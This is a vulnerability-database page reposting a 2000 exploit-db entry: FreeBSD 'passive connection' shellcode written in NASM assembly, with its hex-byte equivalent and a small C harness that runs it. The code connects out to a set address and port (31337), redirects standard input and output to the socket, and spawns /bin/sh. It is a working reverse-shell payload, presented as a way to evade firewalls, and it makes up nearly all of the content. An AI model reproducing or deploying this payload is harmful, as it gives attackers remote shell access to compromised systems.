Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

BSD Passive Connection Shellcode

🗓️ 19 Nov 2000 00:00:00Reported by ScrippieType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 38 Views

FreeBSD passive shellcode for firewall evasion using socket programming via direct syscall.

Code
; Passive Connection Shellcode
;
; Coded by Scrippie - [email protected] - http://b0f.freebsd.lublin.pl
; Buffer0verfl0w Security
; Why? This evades firewalls...
;
; YES, this is for NASM, I detest AT&T syntaxis - it's gross and unreadable
;
; This is the FreeBSD variant I whipped up
;
; Tnx to dvorak for pointing out that BSD's int 80h assumes a stored EIP
; on the stack before making it and that BSD has a somewhat different
; sockaddr_in structure (containing sin_len)

        BITS 32

; Equates - keeps this stuff a lot more clear

PORT            equ 31337               ; What an eleet port!

_exit           equ 1                   ; See /usr/src/sys/kern/syscalls.c
execve          equ 59                  ; See /usr/src/sys/kern/syscalls.c
dup2            equ 90                  ; See /usr/src/sys/kern/syscalls.c
socket          equ 97                  ; See /usr/src/sys/kern/syscalls.c
connect         equ 98                  ; See /usr/src/sys/kern/syscalls.c

IPPROTO_TCP     equ 6                   ; See netinet/in.h
PF_INET         equ 2                   ; See sys/socket.h
SOCK_STREAM     equ 1                   ; See sys/socket.h

sockaddr_in_off equ 0
shell_off       equ 8
shell_ptr_off   equ 16

        jmp short EndCode

Start:
        pop esi                         ; Get offset data in esi

        xor eax, eax
        xor ebx, ebx

        mov bl, IPPROTO_TCP             ; Push IPPROTO_TCP
        push ebx
        mov bl, SOCK_STREAM             ; Push SOCK_STREAM
        push ebx
        mov bl, PF_INET                 ; Push PF_INET
        push ebx
        push ebx                        ; Skipped by int 80h
        mov al, socket                  ; Select socket() syscall

        int 80h                         ; socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
        mov edx, eax                    ; Save the resulting socket descriptor

        mov byte [esi+sockaddr_in_off+1], PF_INET ; sin_family -> PF_INET
        mov word [esi+sockaddr_in_off+2], PORT  ; Set the port number

        mov bl, 16                      ; sizeof(sockaddr_in)
        push ebx

        lea ebx, [esi+sockaddr_in_off]  ; Get offset sockaddr_in into ebx
        push ebx                        ; Push it
        push eax                        ; Still holds sockfd
        push eax                        ; Canary value

        mov al, connect                 ; Select connect() syscall
        int 80h                         ; connect(sockfd, sockaddr_in, 10)

        xor ebx, ebx
        push ebx
        push edx
        mov al, dup2                    ; Select dup2 syscall

        push eax                        ; Ruined
        int 80h

        inc bl
        push ebx
        push edx
        mov al, dup2                    ; Do the same for stdout
        
        push eax
        int 80h

        inc bl
        push ebx
        push edx
        mov al, dup2                    ; And finally for stderr

        push eax
        int 80h

        xor ebx, ebx
        push ebx                        ; *envp == NULL

        lea edi, [esi+shell_off+7]
        xor eax, eax
        xor ecx, ecx
        mov cl, 9
        repe stosb

        lea ebx, [esi+shell_off]        ; Get offset shell into ebx
        mov [esi+shell_ptr_off], ebx    ; Store it at shell_off
        lea ecx, [esi+shell_ptr_off]    ; Get offset shell_off into ecx
        push ecx                        ; argp
        push ebx                        ; command

        push eax                        ; canary
        mov al, execve
        int 80h                         ; Spawn the frikkin' shell

        mov al, _exit                   ; _exit() system call
        int 80h                         ; Do it

EndCode:
        call Start

sockaddr_in     db 'ABCC'               ; A=sin_len - B=sin_family - C=port
                dd 0x100007f            ; IP addr (s_addr) in htonl() form
; 8 bytes not needed ;)

shell           db '/bin/sh' ;,0
;shell_ptr      db 1,2,3,4

------------------------------------------------------------------------------

And here's the shellcode equivalent

char shellcode[]=
"\xeb\x68\x5e\x31\xc0\x31\xdb\xb3\x06\x53\xb3\x01\x53\xb3\x02\x53\x53\xb0\x61\x
cd\x80\x89\xc2\xc6\x46\x01\x02\x66\xc7\x46\x02\x69\x7a\xb3\x10\x53\x8d\x1e\x53\
x50\x50\xb0\x62\xcd\x80\x31\xdb\x53\x52\xb0\x5a\x50\xcd\x80\xfe\xc3\x53\x52\xb0
\x5a\x50\xcd\x80\xfe\xc3\x53\x52\xb0\x5a\x50\xcd\x80\x31\xdb\x53\x8d\x7e\x0f\x3
1\xc0\x31\xc9\xb1\x09\xf3\xaa\x8d\x5e\x08\x89\x5e\x10\x8d\x4e\x10\x51\x53\x50\x
b0\x3b\xcd\x80\xb0\x01\xcd\x80\xe8\x93\xff\xff\xff\x41\x42\x43\x43\x7f\x00\x00\
x01\x2f\x62\x69\x6e\x2f\x73\x68";				    ^
						             Start of IP addr
void main() {
        int *ret;

        ret = (int *)&ret + 2;
        (*ret) = (int)shellcode;
}



# milw0rm.com [2000-11-19]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Nov 2000 00:00Current
7.4High risk
Vulners AI Score7.4
freebsd shellcode firewall evasion socket programming system calls buffer overflow nasm syntax
38